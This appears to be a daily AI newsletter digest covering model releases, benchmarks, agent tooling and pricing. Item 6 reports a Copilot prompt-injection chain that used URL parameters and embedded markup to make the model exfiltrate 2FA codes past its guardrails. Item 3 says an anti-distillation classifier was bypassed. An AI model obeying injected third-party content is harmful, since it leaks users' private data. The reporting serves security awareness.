Inference Brew

Z.ai Releases GLM-5.2 Open-Weights Model with 1M Context Window

00:00 / --:--

← Back to home

Z.ai Releases GLM-5.2 Open-Weights Model with 1M Context Window

1. Z.ai Releases GLM-5.2 Open-Weights Model with 1M Context Window

The model incorporates architectural optimizations including IndexShare, which reuses an indexer across sparse attention layers to reduce compute FLOPs by 2.9 times at maximum context length. It also includes a Multi-Token Prediction layer for speculative decoding that boosts accepted token length by up to 20% during inference. Developers can also access the model via the new GLM Coding Plan starting at $12.60 per month.

  • GLM-5.2 is a 753-billion parameter open-weights model released under an unrestricted MIT license.
  • The model features a 1-million-token context window and supports 'Max' and 'High' thinking modes to adjust reasoning effort.
  • It scored 62.1 on SWE-bench Pro and 74.4 on FrontierSWE, outperforming GPT-5.5 on both benchmarks.
  • API access is priced at $1.40 per million input tokens and $4.40 per million output tokens.
  • The model is available immediately on Hugging Face, Ollama for local execution, and the Z.ai API.

Developers can self-host or access via API a highly capable, MIT-licensed coding model that rivals closed-source frontier models at a fraction of the cost.

2. SubQ 1.1 Small Achieves 12M Token Context with Subquadratic Attention

The model was trained using staged context extension followed by approximately one trillion tokens of continued pretraining on long artifacts. These benchmark results were independently verified by Appen, demonstrating the viability of subquadratic attention for extreme context lengths.

  • SubQ 1.1 Small is the second iteration of the Subquadratic Sparse Attention (SSA) model architecture.
  • The model achieves near-perfect long-context retrieval up to 12 million tokens on the needle-in-a-haystack test.
  • At a 1-million token context, it requires 64.5 times less compute than dense attention and runs 56 times faster than FlashAttention-2.
  • It scored 99.12% on the RULER benchmark at 128K tokens and 85.4% on GPQA Diamond.
  • The model is currently deployed with select design partners, with broader releases planned for later in 2026.

Developers can process massive codebases or document sets locally with drastically reduced compute requirements and faster inference speeds.

SOURCES

3. Qwable-v1 Open-Weights Model Distilled from Claude Fable-5

Claude Fable-5 featured an anti-distillation classifier that redacted thinking blocks within its API, but researchers bypassed this by training on cleartext traces. The resulting Qwable-v1 model and its SFT dataset are now publicly available on Hugging Face, offering a local alternative for complex software engineering tasks.

  • Qwable-v1 is based on the Qwen3.6-35B-A3B architecture and is released under the AGPL-3.0 license.
  • The model was distilled from Claude Fable-5, which was suspended due to U.S. export-control directives after a brief release.
  • It was trained on 4,659 cleartext agentic-coding traces from the Glint-Research/Fable-5-traces corpus.
  • Training took approximately 14 hours on a single NVIDIA H200 GPU.
  • Qwable-v1 retains the ability to emit XML-formatted tool calls, including the str_replace_editor tool.

Developers can run a local, open-weights model optimized for agentic coding tasks and XML-formatted tool calls without relying on expensive or restricted APIs.

SOURCES

4. VibeThinker-3B Small Reasoning Model Achieves Frontier Coding Scores

The model's high success rate on unseen coding challenges indicates strong generalization capabilities despite its small size. The research paper detailing the architecture and training methodology is available on Hugging Face.

  • VibeThinker-3B is a small language model designed to test verifiable reasoning in a parameter-dense regime.
  • The model achieved a 96.1% success rate on recent unseen LeetCode contests, passing 123 out of 128 first-attempt Python submissions.
  • It scored 94.3 on the AIME'26 math benchmark and 80.2 on LiveCodeBench v6.
  • Evaluation settings utilized vLLM and Sglang with a temperature of 1.0 and top_p of 0.95.

Developers can leverage a highly compact 3-billion parameter model for local, low-latency coding and mathematical reasoning tasks.

SOURCES

5. Microsoft Releases FastContext 4B Model for Repository Exploration

Repository exploration is a major bottleneck for coding agents, often requiring massive context windows or expensive search queries. FastContext provides a lightweight, specialized alternative that streamlines how agents navigate and retrieve code from large repositories.

  • FastContext is a 4-billion parameter model released by Microsoft on Hugging Face.
  • The model is optimized specifically for efficient code retrieval and repository exploration by coding agents.
  • It enables open-source coding agents to compete with closed-source models on the SWE-Bench Multilingual benchmark.
  • The model is based on the research paper "FastContext: Training Efficient Repository Explorer for Coding Agents."

Developers can integrate this specialized 4B model into their coding agent pipelines to improve repository-scale code retrieval without relying on expensive closed-source models.

SOURCES

6. Microsoft Patches Critical Copilot Vulnerability That Exposed 2FA Codes

The exploit chain demonstrates how attackers can use markup language or HTML tags embedded in third-party content to force the LLM to exfiltrate data via web requests. Microsoft patched the vulnerability last week, but the attack vector highlights ongoing challenges in securing agentic workflows that process external data.

  • The vulnerability allowed attackers to retrieve 2FA codes and sensitive data from emails accessible to Copilot.
  • Security firm Varonis developed the exploit chain using "Parameter-to-Prompt Injection" via URL query parameters.
  • The exploit bypassed Microsoft's existing guardrails, which include wrapping output in blocks and restricting untrusted websites.
  • The root cause is the fundamental inability of LLMs to distinguish between user instructions and untrusted third-party content.

Developers building LLM applications can prevent third-party content from hijacking model instructions and exfiltrating sensitive user data.

SOURCES

7. Cursor and Graphite Engineers Announce Origin, an Agent-First Git Competitor

Traditional version control systems like Git can be difficult for autonomous agents to navigate due to complex branching and merge conflicts. Origin addresses this by providing agent-friendly interfaces and automated resolution tools, making it easier to integrate coding agents directly into production CI/CD pipelines.

  • Origin is a new version control platform designed to be highly scalable for AI agent workloads.
  • The platform is fully extensible through APIs and the Model Context Protocol (MCP).
  • It features built-in automated tools for merge conflict resolution and CI/CD failure resolution.
  • The product was announced by Tomas Reimers, an engineer at Cursor and Graphite.

Developers can build agentic workflows that interact with version control more reliably using native APIs, MCP support, and automated conflict resolution.

SOURCES

8. Stanford's DeLM Cuts Multi-Agent Costs by 50% Without Orchestrators

Traditional multi-agent systems rely on a central orchestrator, which introduces significant communication overhead and API costs. By decentralizing coordination and allowing agents to read and write to a shared gist database, DeLM parallelizes execution and eliminates redundant LLM calls.

  • DeLM enables AI agents to coordinate directly using a shared knowledge base of summaries called "gists" and a task queue.
  • The framework reduced task costs by approximately 50% and performed 10.5% better than the strongest baseline on SWE-bench Verified.
  • Agents share verified findings, documented failures, and constraints to prevent redundant exploration.
  • An unfoldable system provides compact summaries by default, allowing agents to access detailed evidence only when needed.
  • DeLM achieved the highest accuracy across four major model families on the LongBench-v2 Multi-Doc QA benchmark.

Developers can build highly parallel, cost-effective multi-agent applications that avoid the latency and communication bottlenecks of centralized orchestrators.

SOURCES

9. Databricks Launches Lakehouse//RT and LTAP for Real-Time Agent Data

AI agents often struggle with stale data due to the latency of traditional ETL pipelines. By combining transactional and analytical processing directly at the storage layer, Databricks aims to simplify the data stack, allowing agents to make decisions based on real-time operational data.

  • Lakehouse//RT delivers sub-100ms query latency directly on Delta and Iceberg tables, removing the need for a dedicated real-time serving tier.
  • The Reyden compute engine handles high-concurrency, low-latency serving, reaching up to 12,000 queries per second.
  • LTAP (Lake Transactional/Analytical Processing) automatically stores Postgres-native transactional data in Delta and Iceberg formats at the point of write.
  • The architecture utilizes Lakebase, a serverless cloud-based PostgreSQL database service, to unify data at the storage layer.
  • LTAP performs row-to-column conversion in a caching layer to minimize network costs.

Developers can build AI agents that query live operational and analytical databases directly with sub-100ms latency, eliminating the need for complex ETL pipelines.

SOURCES

10. cuTile Rust Enables Safe, High-Performance GPU Kernel Development

Writing custom CUDA kernels is notoriously error-prone and difficult to debug. cuTile Rust addresses this by bringing Rust's compile-time safety guarantees to GPU programming, supporting synchronous launches, asynchronous pipelines, and CUDA graph replays under the Apache License, Version 2.0.

  • cuTile Rust uses a procedural macro to JIT-compile Rust ASTs into GPU cubins via CUDA Tile IR.
  • On an NVIDIA B200 GPU, it achieves 2 PFlop/s for GEMM, representing 92% of dense f16 peak performance.
  • The Grout inference engine, built on cuTile, runs Qwen3-4B at 171 tokens/second on an RTX 5090.
  • The system extends Rust's ownership discipline across the GPU launch boundary to prevent data races.
  • It requires an NVIDIA GPU with compute capability sm_80 or higher, CUDA 13.3, and Rust 1.89 or later.

Developers building custom local inference engines or optimizing model execution can write safe GPU kernels in Rust without sacrificing raw CUDA performance.

SOURCES

11. Fast-Walk Library Speeds Up Python AST Parsing by 220x

Standard Python AST parsing can become a major bottleneck when agents generate and validate code iteratively. By replacing the standard library's ast.walk with this optimized Rust implementation, developers can accelerate the validation loop of their coding agents.

  • The fast-walk library was developed to resolve performance bottlenecks in the Reflex AI linter when processing generated Python code.
  • Transliterating the walking logic into Rust using PyO3 yielded an initial 78% cumulative performance improvement.
  • Optimizations including direct dictionary access and precomputing AST subclass info in a 2KB table achieved a final 220x speedup.
  • The source code is open-source and available on GitHub under the reflex-dev/fast-walk repository.

Developers building code-generation tools, linters, or LLM agents can drastically reduce the latency of parsing and analyzing Python ASTs.

SOURCES

12. Fireworks and LangChain Build 100x Cheaper Chatbot Trace Judge

Evaluating chatbot interactions typically requires expensive frontier LLMs to act as judges. By fine-tuning a smaller, specialized model on specific interaction traces, Fireworks and LangChain demonstrated that developers can achieve production-grade evaluation accuracy without the high API costs.

  • The trace judge is based on the Qwen-3.5-35B model and is designed to detect user-identified errors.
  • Fine-tuning the model on chat-langchain data allowed it to meet or exceed the performance of frontier models.
  • The fine-tuned judge operates at approximately 100 times lower cost than using frontier models for evaluation.

Developers can evaluate and monitor chatbot performance at a fraction of the cost of using frontier models for trace evaluation.

SOURCES

13. Artificial Analysis Updates Intelligence Index to Focus on Agentic Workloads

The updated GDPval-AA v2 benchmark re-baselines Elo to human performance at 1000, utilizes a rotating panel of frontier-model judges, and increases the turn limit to 250. Task completion times in the index range widely, from 1.5 minutes for Grok 4.3 (high) to 13.5 minutes for Claude Sonnet 4.6 (max).

  • Intelligence Index v4.1 introduces three new per-task metrics: cost per task, time per task, and tokens per task.
  • The update upgrades several benchmarks, including Terminal-Bench 2.1 and τ³-Bench Banking, while removing the saturated IFBench.
  • Claude Opus 4.8 (max) leads available models with a score of 56, followed closely by GPT-5.5 (xhigh) at 55.
  • DeepSeek V4 Pro (max) and MiniMax M3 lead the open-weights category, both scoring 44.
  • The index reports that DeepSeek V4 Pro (max) costs $0.04 per task, compared to $1.78 for Claude Opus 4.8 and $0.99 for GPT-5.5 (xhigh).

Developers can compare frontier and open-weights models using concrete, agent-focused metrics like cost and execution time per task.

SOURCES

14. Analysis Warns of Performance Issues in Small-Scale Claude Distillations

While distilled models promise frontier-level capabilities in smaller open-weights packages, the low volume of fine-tuning data often fails to capture complex reasoning behaviors. Developers are advised to run independent evaluations for their specific use cases rather than assuming distilled variants are inherently superior to the base models.

  • Recent distillations typically use only 4,000 to 10,000 samples, which may be too low to improve model quality.
  • These distilled models can exhibit increased hallucinations and slower performance compared to the base Qwen 3.6 model.
  • Successful distillations, such as DeepSeek-R1, typically require much larger datasets of around 700,000 samples.
  • The Qwopus model, distilled from Claude Opus 4.8, has been reported to exhibit hallucinations and slower execution.

Developers can avoid performance degradation and hallucinations in their applications that result from deploying poorly trained distilled models.

SOURCES

15. Developer Setup and Benchmarks for Local Agentic Coding

While local models have become significantly more capable for programming tasks over the last six months, the author notes they are not yet ready for production software development. Sandboxing the inference server and agent harness in Docker is recommended to restrict system access during execution.

  • The setup utilizes the Gemma 4 model family, specifically gemma-4-26b-a4b and gemma-4-12b-qat, on an M2 Mac with 64 GB of RAM.
  • Local agentic coding is estimated to operate at approximately 75% of the accuracy and speed of closed-source frontier models.
  • The architecture runs LM Studio as an inference server and Pi as an agent harness, both sandboxed inside Docker containers.
  • Key limitations include slow inference speeds, limited context windows, and occasional prompt template mismatches.

Developers can reference this real-world architecture to set up local, sandboxed coding environments while understanding current performance trade-offs.

SOURCES

16. Anthropic Pauses Planned API Billing for Claude Agent SDK

The original billing change, announced on May 13, aimed to treat Claude Agent SDK usage separately from standard chat interface or official CLI usage. Analysis indicates that Claude Opus subscribers can save money on API usage costs after sending just two to three messages per day under the current subscription model.

  • Anthropic paused the pricing changes just before they were scheduled to take effect on June 15.
  • Agent SDK users can continue using their existing Claude subscription limits rather than being billed at separate API rates.
  • The paused plan would have billed SDK usage at standard API rates, offset by a monthly credit equal to the subscription price.
  • Under current subscription tiers, Agent SDK usage remains limited only by standard weekly caps.

Developers building with the Claude Agent SDK can avoid unexpected API charges and continue leveraging their existing subscription caps for agentic workloads.

SOURCES

Inference Brew in your inbox

5 minutes a day. Free, unsubscribe anytime.

Inference Brew in your inbox

5 minutes a day. Free, unsubscribe anytime.